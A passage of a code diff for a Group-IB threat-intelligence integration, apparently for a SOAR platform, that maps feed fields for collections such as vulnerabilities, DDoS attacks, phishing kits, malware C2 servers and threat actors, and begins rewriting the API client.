"linkList.dateDetected", + "datePublished": "linkList.datePublished", + }, + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/public_leak"), + "dynamic": "id", + } + }, + "matches": "matches", # GIB Matches Table + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation }, - "apt/threat": { - "prefix": - "Threat", - "indicators": - [ - { - "main_field": "indicators.params.ipv4", "main_field_type": "IP", - }, - { - "main_field": "indicators.params.domain", "main_field_type": "Domain", - }, - { - "main_field": "indicators.params.url", "main_field_type": "URL", - }, - { - "main_field": "indicators.params.hashes.md5", 
"main_field_type": "File", - "add_fields": - [ - "indicators.params.name", "indicators.params.hashes.md5", - "indicators.params.hashes.sha1", - "indicators.params.hashes.sha256", "indicators.params.size" - ], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "osi/vulnerability": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Group-IB Dates + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateModified": "dateModified", # GIB Date Modified + "datePublished": "datePublished", # GIB Date Published + # END Group-IB Dates + # Information from Group-IB + "id": "id", # GIB ID + "bulletinFamily": "bulletinFamily", # GIB Bulletin Family + "description": "description", # Description + "extDescription": "extDescription", # GIB Extended Description + "reporter": "reporter", # GIB Reporter + "hasExploit": "hasExploit", # GIB Has Exploit + "href": "href", # GIB Href + "mergedCvss": "mergedCvss", # GIB Merged Cvss + "type": "type", # GIB Vulnerability Type + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("osi/vulnerability"), + "dynamic": "id", + } + }, + "cpeTable": { # GIB CPE Table + "product": "cpeTable.product", + "string": "cpeTable.string", + "string23": "cpeTable.string23", + "type": "cpeTable.type", + "vendor": "cpeTable.vendor", + "version": "cpeTable.version", + }, + # END Information from Group-IB + # Group-IB Affected Software + "affectedSoftware": { # GIB Affected Software Table + "name": "affectedSoftware.name", + "operator": "affectedSoftware.operator", + "version": "affectedSoftware.version", + }, + # END Group-IB Affected Software + # Group-IB CVSS Information + "cvss": { + "score": "cvss.score", # GIB CVSS Score + "vector": "cvss.vector", # GIB CVSS Vector + }, + "extCvss": { + "base": "extCvss.base", # GIB Extended CVSS Base + "exploitability": "extCvss.exploitability", # GIB Extended CVSS Exploitability + "impact": "extCvss.impact", # GIB Extended CVSS Impact + 
"overall": "extCvss.overall", # GIB Extended CVSS Overall + "temporal": "extCvss.temporal", # GIB Extended CVSS Temporal + }, + # END Group-IB CVSS Information + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "severity": "evaluation.severity", + "id": "id", + "cvss_score": "cvss.score", + "description": "description", + "dateLastSeen": "dateLastSeen", + "datePublished": "datePublished", + "software_mixed": { + "names": "softwareMixed.softwareName", + "types": "softwareMixed.softwareType", + "versions": "softwareMixed.softwareVersion", + }, + }, }, - "hi/threat": { - "prefix": - "Threat", - "indicators": - [ - { - "main_field": "indicators.params.ipv4", "main_field_type": "IP", - }, - { - "main_field": "indicators.params.domain", "main_field_type": "Domain", - }, - { - "main_field": "indicators.params.url", "main_field_type": "URL", - }, - { - "main_field": "indicators.params.hashes.md5", "main_field_type": "File", - "add_fields": - [ - "indicators.params.name", "indicators.params.hashes.md5", - "indicators.params.hashes.sha1", - "indicators.params.hashes.sha256", "indicators.params.size" - ], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "attacks/ddos": { # GIB Source:sourceType, severity:systemSeverity + "name": "target.ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateBegin": "dateBegin", # GIB DDOS Date Begin + "dateEnd": "dateEnd", # GIB DDOS Date End + "dateReg": "dateReg", # GIB DDOS Date Registration + "duration": "duration", # GIB DDOS Duration + "protocol": "protocol", # GIB DDOS Protocol + "source": "source", # GIB DDOS Source + "type": "type", # GIB DDOS Type + "malwareName": 
"malware.name", # GIB Malware Name + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/ddos"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # CNC Information from Group-IB + "cnc": { + "cnc": "cnc.cnc", # GIB CNC + "domain": "cnc.domain", # GIB CNC Domain + "port": "cnc.port", # GIB CNC Port + "url": "cnc.url", # GIB CNC URL + }, + # END CNC Information from Group-IB + # Group-IB Threat Actor + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + }, + # End Group-IB Threat Actor + # Group-IB DDOS Target + "target": { + "url": "target.url", # GIB DDOS Target URL + "asn": "target.ipv4.asn", # GIB DDOS Target ASN + "city": "target.ipv4.city", # GIB DDOS Target City + "region": "target.ipv4.region", # GIB DDOS Target Region + "provider": "target.ipv4.provider", # GIB DDOS Target Provider + "countryCode": "target.ipv4.countryCode", # GIB DDOS Target Country Code + "countryName": "target.ipv4.countryName", # GIB DDOS Target Country Name + "ip": "target.ipv4.ip", # GIB DDOS Target IP + "port": "target.port", # GIB DDOS Target Port + "category": "target.category", # GIB DDOS Target Category + "domain": "target.domain", # GIB DDOS Target Domain + }, + # END Group-IB DDOS Target + # Group-IB DDOS Request + "requestData": { + "link": "requestData.link", # GIB DDOS Request Data Link + "headersHash": "requestData.headersHash", # GIB DDOS Request Headers Hash + "body": "requestData.body", # GIB DDOS Request Body + "bodyHash": "requestData.bodyHash", # GIB DDOS Request Body Hash + }, 
+ # END Group-IB DDOS Request + "indicators": { # GIB Related Indicators Data + "target_ipv4_ip": "target.ipv4.ip", + "cnc_url": "cnc.url", + "cnc_domain": "cnc.domain", + "cnc_ipv4_ip": "cnc.ipv4.ip", + "cnc_ipv4_asn": "cnc.ipv4.asn", + "cnc_ipv4_country_name": "cnc.ipv4.countryName", + "cnc_ipv4_region": "cnc.ipv4.region", + }, }, - "suspicious_ip/tor_node": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Tor Node", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/deface": { # GIB Source:sourceType, severity:systemSeverity + "name": "url", + # Information from Group-IB + "id": "id", # GIB ID + "mirrorLink": "mirrorLink", # GIB Mirror Link + "providerDomain": "providerDomain", # GIB Provider Domain + "siteUrl": "siteUrl", # GIB Deface Site URL + "source": "source", # GIB Deface Source + "targetDomain": "targetDomain", # GIB Target Domain + "targetDomainProvider": "targetDomainProvider", # GIB Target Domain Provider + "date": "date", # GIB Deface Date + "contacts": "contacts", # GIB Deface Contacts + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/deface"), + "dynamic": "id", + } + }, + # END Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Target IP + "targetIp": { + "asn": "targetIp.asn", # GIB Target ASN + "city": "targetIp.city", # GIB Target City + "countryCode": "targetIp.countryCode", # GIB Country Code + "countryName": "targetIp.countryName", # GIB Country Name + "ip": "targetIp.ip", # GIB Target IP + "provider": "targetIp.provider", # GIB 
Target Provider + "region": "targetIp.region", # GIB Target Region + }, + # END Group-IB Target IP + # Group-IB Threat Actor + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + }, + # End Group-IB Threat Actor + "indicators": { # GIB Related Indicators Data + "url": "url", + "target_domain": "targetDomain", + "target_ip_ip": "targetIp.ip", + "target_ip_asn": "targetIp.asn", + "target_ip_country_name": "targetIp.countryName", + "target_ip_region": "targetIp.region", + }, }, - "suspicious_ip/open_proxy": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Open Proxy", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/phishing_group": { # GIB Source:sourceType, severity:systemSeverity + "name": "brand", + # Information from Group-IB + "id": "id", # GIB ID + "brand": "brand", # GIB Phishing Brand + "phishing_urls": "phishing.url", # GIB Phishing URLs + "objective": "objective", # GIB Phishing Objectives + "source": "source", # GIB Phishing Sources + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/phishing_group"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Dates + "blocked": "date.blocked", # GIB Phishing Date Blocked + "added": "date.added", # GIB Phishing Date Added + "detected": "date.detected", # GIB Phishing Date Detected + "updated": "date.updated", # GIB Phishing Date Updated + # END Group-IB Dates + # Group-IB Domain Information + "domainInfo": { + "domain": "domainInfo.domain", # GIB Phishing Domain + "domainPuny": "domainInfo.domainPuny", # GIB Phishing Domain Puny + "expirationDate": "domainInfo.expirationDate", # GIB Phishing Domain Expiration Date + "registrar": "domainInfo.registrar", 
# GIB Phishing Registrar + }, + # END Group-IB Domain Information + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Phishing Information + "phishing_ip": { # GIB Phishing IP Table + "ip": "ip.ip", + "countryCode": "ip.countryCode", + "countryName": "ip.countryName", + "provider": "ip.provider", + }, + # End Phishing Information from Group-IB + # Group-IB Threat Actor Information + "threatActor": { + "id": "threatActor.id", # GIB Threat Actor ID + "name": "threatActor.name", # GIB Threat Actor Name + }, + # End Group-IB Threat Actor Information + # Group-IB Phishing Kit Table + "phishing_kit_table": { # GIB Phishing Kit Table + "name": "phishing.phishingKit.name", + "email": "phishing.phishingKit.email", + }, + # END Group-IB Phishing Kit Table + "indicators": { # GIB Related Indicators Data + "url": "phishing.url", + "phishing_domain_domain": "domain", + "phishing_domain_registrar": "domainInfo.registrar", + "ipv4_ip": "phishing.ip.ip", + "ipv4_country_name": "phishing.ip.countryName", + }, }, - "suspicious_ip/socks_proxy": { - "name": - "ipv4.ip", - "prefix": - "Suspicious IP Socks Proxy", - "indicators": - [ - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "attacks/phishing_kit": { # GIB Source:sourceType, severity:systemSeverity + "name": "hash", + # Information from Group-IB + "id": "id", # GIB ID + "hash": "hash", # GIB Data Hash + "dateDetected": "dateDetected", # GIB Date of Detection + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "source": "source", # GIB Phishing Kit Source + 
"emails": "emails", # GIB Phishing Kit Email + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("attacks/phishing_kit"), + "dynamic": "id", + } + }, + "downloadedFrom": { # GIB Downloaded From Table + "date": "downloadedFrom.date", + "url": "downloadedFrom.url", + "phishingUrl": "downloadedFrom.phishingUrl", + "domain": "downloadedFrom.domain", + "fileName": "downloadedFrom.fileName", + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": {"emails": "emails"}, # GIB Related Indicators Data }, - "malware/cnc": { - "name": - "ipv4.ip", - "prefix": - "Malware CNC", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL" - }, - { - "main_field": "domain", "main_field_type": "Domain" - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP", - "add_fields": ["ipv4.asn", "ipv4.countryName", "ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "suspicious_ip/tor_node": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/tor_node"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB 
Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, }, - "osi/vulnerability": { - "name": - "id", - "prefix": - "OSI Vulnerability", - "indicators": - [ - { - "main_field": "id", "main_field_type": "CVE", - "add_fields": ["cvss.score", "description", "dateLastSeen", "datePublished"], - "add_fields_types": ["cvss", "cvedescription", "cvemodified", "published"] - } - ] + "suspicious_ip/open_proxy": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + "port": "port", # GIB Proxy Port + "source": "source", # GIB Proxy Source + "sources": "sources", # GIB Proxy Sources + "type": "type", # GIB Proxy Type + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/open_proxy"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/socks_proxy": { # GIB Source:sourceType, severity:systemSeverity + "name": "ipv4.ip", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + 
"source": "source", # GIB Socks Proxy Source + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/socks_proxy"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/vpn": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "sources": "sources", # GIB VPN Sources + "names": "names", # GIB VPN Names + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/vpn"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "suspicious_ip/scanner": { # GIB Source:sourceType, severity:systemSeverity + "name": "id", + # Information from Group-IB + "id": "id", # GIB ID + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + 
"portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("suspicious_ip/scanner"), + "dynamic": "id", + } + }, + "categories": "categories", # GIB Scanner Categories + "sources": "sources", # GIB Scanner Sources + # End Information from Group-IB + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + "indicators": { # GIB Related Indicators Data + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "ipv4_country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + }, + }, + "malware/cnc": { # GIB Source:sourceType + "name": "cnc", + # Information from Group-IB + "id": "id", # GIB ID + "cnc": "cnc", # GIB CNC URL + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "dateDetected": "dateDetected", # GIB Date of Detection + "domain": "domain", # GIB Malware CNC Domain + "malwareList": { # GIB Malware Table + "id": "malwareList.id", + "name": "malwareList.name", + }, + # End Information from Group-IB + # Group-IB Threat Actor + "threatActor": { # GIB Threat Actors Table + "id": "threatActor.id", + "name": "threatActor.name", + }, + # End Group-IB Threat Actor + "indicators": { # GIB Related Indicators Data + "url": "url", + "domain": "domain", + "ipv4_ip": "ipv4.ip", + "ipv4_asn": "ipv4.asn", + "country_name": "ipv4.countryName", + "ipv4_region": "ipv4.region", + "cnc": "cnc", + }, + }, + "malware/malware": { # GIB Source:sourceType + # Information from Group-IB + "id": "id", # GIB ID + "name": "name", + "malware_name": "name", # GIB Malware Name + "updatedAt": "updatedAt", # GIB Date Updated At + "aliases": "aliases", # GIB Malware Aliases + "category": "category", # GIB Malware Categories + "description": 
"description", # GIB Malware Description + "shortDescription": "shortDescription", # GIB Malware Short Description + "geoRegion": "geoRegion", # GIB Malware Regions + "langs": "langs", # GIB Malware Langs + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("malware/malware"), + "dynamic": "id", + } + }, + "sourceCountry": "sourceCountry", # GIB Malware Source Countries + "platform": "platform", # GIB Malware Platforms + "threatLevel": "threatLevel", # GIB Threat Level + # End Information from Group-IB + # Group-IB Threat Actor + "taList": { # GIB Threat Actors Table + "id": "taList.id", + "name": "taList.name", + }, + # END Group-IB Threat Actor + }, + "hi/threat": { # GIB Source:sourceType, severity:systemSeverity + "name": "threatActor.name", + # Group-IB Threat Actor + "threatActor": { + "country": "threatActor.country", # GIB Threat Actor Country + "id": "threatActor.id", # GIB Threat Actor ID + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + "name": "threatActor.name", # GIB Threat Actor Name + }, + # END Group-IB Threat Actor + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Cybercriminal Forum Information + "forumsAccounts": { # GIB Cybercriminal Forums Table + "nickname": "forumsAccounts.nickname", + "url": "forumsAccounts.url", + }, + # END Group-IB Cybercriminal Forum Information + # Information from Group-IB + "id": "id", # GIB ID + "title": "title", # GIB Cybercriminal Threat Title + "description": "description", # GIB Cybercriminal Threat Description + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "dateLastSeen", # GIB Date Last Seen + "isTailored": 
"isTailored", # GIB Is Tailored + "expertise": "expertise", # GIB Cybercriminal Expertises + "regions": "regions", # GIB Cybercriminal Regions + "sectors": "sectors", # GIB Cybercriminal Sectors + "reportNumber": "reportNumber", # GIB Report Number + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("hi/threat"), + "dynamic": "id", + } + }, + # End Information from Group-IB + "indicators": { # GIB Related Indicators Data + "ipv4": "indicators.params.ipv4", + "domain": "indicators.params.domain", + "url": "indicators.params.url", + "hashes_md5": "indicators.params.hashes.md5", + "name": "indicators.params.name", + "hashes_sha1": "indicators.params.hashes.sha1", + "hashes_sha256": "indicators.params.hashes.sha256", + "size": "indicators.params.size", + }, + }, + "hi/threat_actor": { # GIB Source:sourceType + # Information from Group-IB + "name": "name", + "id": "id", # GIB ID + "aliases": "aliases", # GIB Cybercriminal Threat Actor Aliases + "description": "description", # GIB Cybercriminal Threat Actor Description + "isAPT": "isAPT", # GIB Threat Actor is APT + "threat_actor_name": "name", # GIB Threat Actor Name + "expertise": "stat.expertise", # GIB Cybercriminal Expertises + "regions": "stat.regions", # GIB Cybercriminal Regions + "sectors": "stat.sectors", # GIB Cybercriminal Sectors + "malware": "stat.malware", # GIB Cybercriminal Malware + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("hi/threat_actor"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Threat Actor Reports + "reports": { # GIB Cybercriminal Threat Actor Reports Table + "id": "stat.reports.id", + "name": "stat.reports.name.en", + "datePublished": "stat.reports.datePublished", + }, + # END Group-IB Threat Actor Reports + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "updatedAt": "updatedAt", # GIB Date Updated At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + 
"dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + # END Group-IB Dates + }, + "apt/threat_actor": { # GIB Source:sourceType + # Information from Group-IB + "name": "name", + "id": "id", # GIB ID + "aliases": "aliases", # GIB Nation-State Cybercriminals Threat Actor Aliases + "country": "country", # GIB Nation-State Cybercriminals Threat Actor Country + "description": "description", # GIB Nation-State Cybercriminals Threat Actor Description + "goals": "goals", # GIB Nation-State Cybercriminals Threat Actor Goals + "isAPT": "isAPT", # GIB Threat Actor is APT + "labels": "labels", # GIB Nation-State Cybercriminals Threat Actor Labels + "threat_actor_name": "name", # GIB Threat Actor Name + "roles": "roles", # GIB Nation-State Cybercriminals Threat Actor Roles + "cve": "stat.cve", # GIB Nation-State Cybercriminals Threat Actor CVE + "expertise": "stat.expertise", # GIB Nation-State Cybercriminals Expertises + "malware": "stat.malware", # GIB Nation-State Cybercriminals Malware + "regions": "stat.regions", # GIB Nation-State Cybercriminals Regions + "sectors": "stat.sectors", # GIB Nation-State Cybercriminals Sectors + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("apt/threat_actor"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Threat Actor Reports + "reports": { # GIB Nation-State Cybercriminals Threat Actor Reports Table + "id": "stat.reports.id", + "name": "stat.reports.name.en", + "datePublished": "stat.reports.datePublished", + }, + # END Group-IB Threat Actor Reports + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + "updatedAt": "updatedAt", # GIB Date Updated At + # END Group-IB Dates + }, + "apt/threat": { # GIB Source:sourceType, severity:systemSeverity + "name": "threatActor.name", + # Information from Group-IB + "id": "id", # GIB ID + 
"title": "title", # GIB Nation-State Cybercriminals Threat Title + "countries": "countries", # GIB Nation-State Cybercriminals Threat Countries + "description": "description", # GIB Nation-State Cybercriminals Threat Description + "expertise": "expertise", # GIB Nation-State Cybercriminals Threat Expertises + "isTailored": "isTailored", # GIB Is Tailored + "labels": "labels", # GIB Nation-State Cybercriminals Threat Actor Labels + "langs": "langs", # GIB Nation-State Cybercriminals Threat Langs + "regions": "regions", # GIB Nation-State Cybercriminals Threat Regions + "reportNumber": "reportNumber", # GIB Nation-State Cybercriminals Threat Report Number + "sectors": "sectors", # GIB Nation-State Cybercriminals Threat Sectors + "portalLink": { # GIB Portal Link + "__concatenate": { + "static": PORTAL_LINKS.get("apt/threat"), + "dynamic": "id", + } + }, + # End Information from Group-IB + # Group-IB Dates + "createdAt": "createdAt", # GIB Date Created At + "dateFirstSeen": "stat.dateFirstSeen", # GIB Date First Seen + "dateLastSeen": "stat.dateLastSeen", # GIB Date Last Seen + "datePublished": "datePublished", # GIB Date Published + # END Group-IB Dates + # Group-IB Threat Actor + "threatActor": { + "country": "threatActor.country", # GIB Threat Actor Country + "id": "threatActor.id", # GIB Threat Actor ID + "isAPT": "threatActor.isAPT", # GIB Threat Actor is APT + "name": "threatActor.name", # GIB Threat Actor Name + }, + # END Group-IB Threat Actor + # Group-IB Evaluation + "evaluation": { + "admiraltyCode": "evaluation.admiraltyCode", # GIB Admiralty Code + "credibility": "evaluation.credibility", # GIB Credibility + "reliability": "evaluation.reliability", # GIB Reliability + "severity": "evaluation.severity", # GIB Severity + }, + # END Group-IB Evaluation + # Group-IB Cybercriminal Forum Information + "forumsAccounts": { # GIB Nation-State Cybercriminal Forums Table + "nickname": "forumsAccounts.nickname", + "url": "forumsAccounts.url", + }, + # END Group-IB 
Cybercriminal Forum Information + "indicators": { # GIB Related Indicators Data + "ipv4": "indicators.params.ipv4", + "domain": "indicators.params.domain", + "url": "indicators.params.url", + "hashes_md5": "indicators.params.hashes.md5", + "name": "indicators.params.name", + "hashes_sha1": "indicators.params.hashes.sha1", + "hashes_sha256": "indicators.params.hashes.sha256", + "size": "indicators.params.size", + }, }, - "hi/threat_actor": {"prefix": "Threat Actor"}, - "apt/threat_actor": {"prefix": "Threat Actor"} } -STATUS_CODE_MSGS = { - 401: "Bad Credentials", - 403: "Something is wrong with your account, please, contact GIB.", - 404: "Not found. There is no such data on server.", - 500: "There are some troubles on server with your request.", - 301: "Verify that your public IP is whitelisted by Group IB.", - 302: "Verify that your public IP is whitelisted by Group IB." +DEPRECATED_COLLECTIONS = { + "malware/targeted_malware": "malware/malware", + "compromised/masked_cards": "compromised/bank_card_group", + "compromised/bank_card": "compromised/bank_card_group", + "compromised/card": "compromised/bank_card_group", + "compromised/account": "compromised/account_group", + "attacks/phishing": "attacks/phishing_group", } -# LEGACY_HEADERS = { -# "Accept": "application/json", -# 'Connection': 'Keep-Alive', -# 'Keep-Alive': "30" -# } - -TIMEOUT = 60. -RETRIES = 4 -STATUS_LIST_TO_RETRY = [429, 500] +REMOVED_COLLECTIONS = ["bp/phishing", "bp/phishing_kit", "compromised/imei"] class Client(BaseClient): 
@@ -439,590 +1400,699 @@ class Client(BaseClient): Should only do requests and return data. """ - def _create_update_generator(self, collection_name: str, max_requests: int, - date_from: str | None = None, seq_update: int | str = '', - limit: int = 200) -> Generator: - """ - Creates generator of lists with feeds class objects for an update session - (feeds are sorted in ascending order) `collection_name` with set parameters. - - `seq_update` allows you to receive all relevant feeds. Such a request uses the seq_update parameter, - you will receive a portion of feeds that starts with the next `seq_update` parameter for the current collection. - For all feeds in the Group IB Intelligence continuous numbering is carried out. - For example, the `seq_update` equal to 1999998 can be in the `compromised/accounts` collection, - and a feed with seq_update equal to 1999999 can be in the `attacks/ddos` collection. - If item updates (for example, if new attacks were associated with existing APT by our specialists - or tor node has been detected as active again), the item gets a new parameter and it automatically rises - in the database and "becomes relevant" again. - - :param collection_name: collection to update. - :param max_requests: a maximum number of requests to API. - :param date_from: start date of update session. - :param seq_update: identification number from which to start the session. 
- """ - requests_count = 0 - while True: - if requests_count >= max_requests: - break - session = requests.Session() - session.auth = HTTPBasicAuth(self._auth[0], self._auth[1]) - - session.headers["Accept"] = "*/*" - session.headers["User-Agent"] = f'SOAR/CortexSOAR/{self._auth[0]}/unknown' - - params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update} - params = {key: value for key, value in params.items() if value} - portion = session.get(url=f'{self._base_url}{collection_name}/updated', params=params, timeout=60).json() - - # params = {"df": date_from, "seqUpdate": seq_update} - # params = assign_params(**params) - # portion = self._http_request(method="GET", url_suffix=collection_name + "/updated", - # params=params, timeout=TIMEOUT, retries=RETRIES, - # status_list_to_retry=STATUS_LIST_TO_RETRY) - if portion.get("count") == 0: - break - seq_update = portion.get("seqUpdate") - date_from = None - requests_count += 1 + limit = 100 + + def __init__(self, base_url, verify=True, proxy=False, headers=None, auth=None): + super().__init__( + 